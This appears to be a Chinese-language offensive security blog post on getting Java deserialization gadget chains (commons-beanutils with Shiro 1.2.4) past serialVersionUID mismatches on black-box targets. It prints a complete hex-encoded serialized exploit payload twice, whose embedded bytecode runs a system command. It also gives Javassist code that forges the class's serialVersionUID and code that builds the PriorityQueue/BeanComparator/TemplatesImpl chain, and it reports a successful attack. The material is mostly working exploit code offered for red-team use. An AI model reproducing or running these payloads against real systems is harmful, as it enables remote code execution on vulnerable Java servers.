How to resolve serialVersionUID version discrepancies in Java?

Research
,

在打反序列化链子的时候,尤其像 cb 和 cc 这种链子,在遇到一些框架环境中,难免会遇到一些环境报出 serialVersionUID 不同的问题

这也就是一个依赖可能有多个版本,而每个版本中的同名类,可能会有变化。serialVersionUID(后面简称suid)就是为了解决这个问题而出现的。这表现在,本地通过cb1.9.4生成的利用链,到服务端cb1.8.3就打不了 - Java反序列化链探测

这里大家都知道serialVersionUID(简称 suid)不匹配本质上是 Java 的一种安全保护机制,旨在确保序列化对象和接收端的类定义是二进制兼容的,所以实战遇到的时候还是挺头疼的,而且打红的时候都是黑盒,你压根不知道版本是多少,但还是有绕过的手法的

在开始前,我们得先知道为什么 SUID 会变,如果钻研底层,会发现 JVM 判断两个类是否相同,除了看类型还会看 SUID,这里分两种情况

  • 显式声明:如果开发者手动定义了 private static final long serialVersionUID = 1L;,那么只要这个值不懂,即使类成员变了,反序列化也能成功(当然不排除会抛出类型转换异常)
  • 隐式计算:如果类中没有显式声明 SUID,Java 编译器会根据类的细节(方法名、属性、修饰符等等)通过 SHA 算法自动生成一个 64 位的哈希值

例如下面这条链子我们可以用 https://github.com/NickstaDB/SerializationDumper 这个工具来查看具体的 suid

1
java -jar SerializationDumper-v1.14.jar aced0005737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870000000027372002b6f72672e6170616368652e636f6d6d6f6e732e6265616e7574696c732e4265616e436f6d70617261746f72e3a188ea7322a4480200024c000a636f6d70617261746f7271007e00014c000870726f70657274797400124c6a6176612f6c616e672f537472696e673b78707372003f6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e636f6d70617261746f72732e436f6d70617261626c65436f6d70617261746f72fbf49925b86eb13702000078707400106f757470757450726f706572746965737704000000037372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00044c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff757200035b5b424bfd19156767db37020000787000000001757200025b42acf317f8060854e0020000787000000502cafebabe00000034002b0a0007001e0a001f00200800210a001f00220700230700240700250100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100104c6578702f63616c63756c61746f723b01000d537461636b4d61705461626c650700240700230100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100016401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b010001730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b0100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b295601000264690100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b0100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a536f7572636546696c6501000f63616c63756c61746f722e6a6176610c000800090700260c002700280100126f70656e202d612043616c63756c61746f720c0029002a0100136a6176612f6c616e672f457863657074696f6e01000e6578702f63616c63756c61746f72010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c65740100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0021000600070000000000030001000800090001000a0000006600020002000000122ab70001b800021203b6000457a700044cb100010004000d001000050003000b0000001200040000000600040008000d00090011000a000c0000000c000100000012000d000e0000000f000000100002ff001000010700100001070011000001001200130001000a0000003f0000000300000001b100000002000b0000000600010000000c000c00000020000300000001000d000e000000000001001400150001000000010016001700020001001200180001000a000000490000000400000001b100000002000b0000000600010000000e000c0000002a000400000001000d000e000000000001001400150001000000010019001a0002000000010016001b00030001001c00000002001d7074000550776e6564707701007871007e000d78

image-20260501170727404

简单整理一下

1
2
3
4
5
6
7
8
java.util.PriorityQueue
	suid: 0x94da30b4fb3f82 b1
org.apache.commons.beanutils.BeanComparator
	suid: 0xe3a188ea7322a448
org.apache.commons.collections.comparators.ComparableComparator
	suid: 0xfbf49925b86eb137
com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
	suid: 0x09574fc16eacab33

环境对齐

这个是比较直白的方法,通过报错信息,一般是 local class incompatible: stream classdesc serialVersionUID = X, local class serialVersionUID = Y 则可以确定服务端的版本,然后下载对应的 jar 包,或者 maven 重新拉一个,然后本地切换依赖重新生成 payload

使用 URLDNS 进行探测

URLDNS 链是 Java 反序列化中的“敲门砖”。由于它只依赖 JDK 自带的类(如 java.util.HashMap),而 JDK 核心类的 SUID 在不同次要版本间通常保持高度稳定性,因此它不受第三方库版本波动的影响。

动态修改 Payload

先用正常的环境打一遍,依赖如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<dependency>
  <groupId>org.apache.shiro</groupId>
  <artifactId>shiro-web</artifactId>
  <version>1.2.4</version>
</dependency>
<dependency>
  <groupId>commons-beanutils</groupId>
  <artifactId>commons-beanutils</artifactId>
  <version>1.8.3</version>
  <!--      <version>1.9.4</version>-->
</dependency>
<dependency>
  <groupId>commons-collections</groupId>
  <artifactId>commons-collections</artifactId>
  <version>3.2.1</version>
</dependency>

image-20260501171211608

然后再用高版本 cb 去打低版本 cb 会发现报错了

image-20260501171644104

这时候就得动态修改成服务端一样的 serialVersionUID 了,具体怎么做了,直接用 Javassist 是个不错的选,这里编写一个 fixSUID() 函数来动态修改我们的 serialVersionUID 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
public static void fixSUID() throws Exception {
    ClassPool classPool = ClassPool.getDefault();
    CtClass ctClass = classPool.get("org.apache.commons.beanutils.BeanComparator");
    // 先删掉
    try {
        CtField oldField = ctClass.getDeclaredField("serialVersionUID");
        ctClass.removeField(oldField);
    } catch (javassist.NotFoundException e) {
        System.out.println("SUID field not found, adding a new one...");
    }
    // 然后加上目标的 SUID
    CtField suidField = new CtField(CtClass.longType, "serialVersionUID", ctClass);
    suidField.setModifiers(javassist.Modifier.PRIVATE | javassist.Modifier.STATIC | javassist.Modifier.FINAL);
    ctClass.addField(suidField, "-3490850999041592962L");
    // 接着重新塞回 JVM
    ctClass.toClass();
}

然后在链子前面加上这个函数用于动态修改

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
public static Object getPayload() throws Exception {
    fixSUID();
    byte[] code = Files.readAllBytes(Paths.get("/Users/icecliffs/Documents/Coding/java_shiro/target/classes/exp/Calculator.class"));
    TemplatesImpl templates = new TemplatesImpl();
    setFieldValue(templates, "_bytecodes", new byte[][]{code});
    setFieldValue(templates, "_name", "Pwned");
    setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
    final BeanComparator comparator = new BeanComparator(null);
    PriorityQueue<Object> queue = new PriorityQueue<>(2, comparator);
    queue.add(1);
    queue.add(1);
    setFieldValue(comparator, "property", "outputProperties");
    setFieldValue(queue, "queue", new Object[]{templates, templates});
    return queue;
}

接着重新跑一条出来

1
java -jar SerializationDumper-v1.14.jar aced0005737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870000000027372002b6f72672e6170616368652e636f6d6d6f6e732e6265616e7574696c732e4265616e436f6d70617261746f72cf8e0182fe4ef17e0200024c000a636f6d70617261746f7271007e00014c000870726f70657274797400124c6a6176612f6c616e672f537472696e673b78707372003f6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e636f6d70617261746f72732e436f6d70617261626c65436f6d70617261746f72fbf49925b86eb13702000078707400106f757470757450726f706572746965737704000000037372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00044c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff757200035b5b424bfd19156767db37020000787000000001757200025b42acf317f8060854e0020000787000000502cafebabe00000034002b0a0007001e0a001f00200800210a001f00220700230700240700250100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100104c6578702f63616c63756c61746f723b01000d537461636b4d61705461626c650700240700230100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100016401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b010001730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b0100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b295601000264690100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b0100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a536f7572636546696c6501000f63616c63756c61746f722e6a6176610c000800090700260c002700280100126f70656e202d612043616c63756c61746f720c0029002a0100136a6176612f6c616e672f457863657074696f6e01000e6578702f63616c63756c61746f72010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c65740100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0021000600070000000000030001000800090001000a0000006600020002000000122ab70001b800021203b6000457a700044cb100010004000d001000050003000b0000001200040000000600040008000d00090011000a000c0000000c000100000012000d000e0000000f000000100002ff001000010700100001070011000001001200130001000a0000003f0000000300000001b100000002000b0000000600010000000c000c00000020000300000001000d000e000000000001001400150001000000010016001700020001001200180001000a000000490000000400000001b100000002000b0000000600010000000e000c0000002a000400000001000d000e000000000001001400150001000000010019001a0002000000010016001b00030001001c00000002001d7074000550776e6564707701007871007e000d78

image-20260501172525916

然后发送 poc,会发现打成功了

image-20260501172616374

Support via Solana

Solana

Solana

Solana Pay

Solana Pay

WeChat

WeChat